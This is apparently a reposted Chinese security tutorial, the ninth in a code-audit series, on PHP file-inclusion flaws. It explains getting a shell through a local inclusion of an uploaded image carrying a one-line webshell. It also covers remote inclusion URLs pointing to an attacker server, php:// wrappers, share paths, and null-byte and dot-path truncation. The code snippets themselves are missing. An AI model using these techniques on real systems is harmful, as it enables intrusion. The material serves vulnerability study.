代码审计的艺术系列—第九篇
来源:互联网 发布:新菜鸟网络俱乐部 编辑:程序博客网 时间:2024/06/05 15:02
0x00前言:
作者:HackBraid,乌云核心白帽子。 文件包含漏洞也是一种非常常见的漏洞类型,产生的原因是传入的文件名没有经过合理的校验,从而让黑客包含了精心构造的文件最终造成的代码注入。所以一套源码快速发掘并利用文件包含getshell是这篇要讨论的,主要分为危险函数、本地文件包含、远程文件包含和截断技巧四方面展开。0x01危险函数:
include()include_once()require()require_once()0x02文件包含漏洞的脑图:
0x03 本地文件包含 :
本地文件包含漏洞常用的场景是用户上传头像image.jpg,image.jpg里存在PHP一句话木马,然后我们利用本地文件包含将image.jpg加载进来即可执行一句话命令从而getshell。缺陷代码如下:程序本意是获取action并引入action里的功能函数,这里我们上传了头像image.jpg,然后包含进来发现在页面显示了phpinfo的信息:那么这里上传的头像image.jpg代码改为一句话木马:使用菜刀成功getshell:0x04 远程文件包含 :
1.普通远程文件包含条件:allow_url_include=on(默认off)、allow_url_fopen=on缺陷代码:然后我们浏览器输入:http://localhost/fileinclude.php?action=http://*.*.*.*/test.txt其中http://*.*.*.*/test.txt是我自己的服务器,里面的test.txt内容如下:当然也可以包含一句话木马进一步getshell。2.有限制远程文件包含条件:allow_url_include=on伪协议php://input和php://filter包含测试发现可以继续愉快的包含了包含共享文件
这种情况是你可以传到文件到内网某台服务器192.168.1.102,假如这台服务器是ftp是开了共享的就可以通过下面方法进行包含:
http://localhost/fileinclude.php?action=\\192.168.1.102\share\test.txt
0x05 截断技巧 :
1.PHP%00截断截断条件:①PHP版本小于5.3.4,详情请查看[CVE-2006-7243](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7243)
②magic_quotes_gpc=Off,否则%00这种空字符会被转义为\0
搭建好满足上面两个条件的测试环境后,可以用下面的漏洞代码来测试:不同之处是这里后面强制加了jpg的后缀,所以需要通过截断的技巧来继续包含2.多个./截断截断条件:PHP版本小于5.3
Windows240个.或者./可以截断
测试240个点截断成功如下图:Linux是2038个/.可以截断,自行搭建环境测试吧~本篇的内容,我们就介绍到这里,下一篇欢迎持续关注。
原创文章,转载请注明: 转载自安兔|anntoo.com 互联网安全新媒体平台
本文链接地址: 代码审计的艺术系列-第九篇
0 0
- 代码审计的艺术系列—第九篇
- 代码审计的艺术系列—第二篇
- 代码审计的艺术系列—第三篇
- 代码审计的艺术系列—第四篇
- 代码审计的艺术系列—第五篇
- 代码审计的艺术系列—第六篇
- 代码审计的艺术系列—第七篇
- 代码审计的艺术系列—第八篇
- 代码审计的艺术系列—第一篇
- 代码审计的思路
- 《Qt编程的艺术》——第九章 QtSql模块
- php代码审计相关的
- CSS代码缩写,占用更少的带宽--第九系列
- 代码审计
- 写代码的艺术
- 修改代码的艺术
- 代码优化的艺术
- 代码优化的艺术
- [LeetCode 107]Binary Tree Level Order Traversal II(递归法)
- Java-继承与构造函数
- eclipse提交项目到github
- 《css权威指南》——笔记3(结构与层叠)
- LA 5135 Mining Your Own Business(点双连通分量+贪心)
- 代码审计的艺术系列—第九篇
- 死锁的产生和解决
- 用万网云虚拟主机搭建一个自有域名的WordPress博客
- UVA 10820 Send a Table [欧拉函数] [线性筛法]
- YOLO配置运行
- 机房建设效果图制作|机房鸟瞰图设计|教程文章
- Android中数据存储
- 使用数组存储邻接表
- WEB重点总结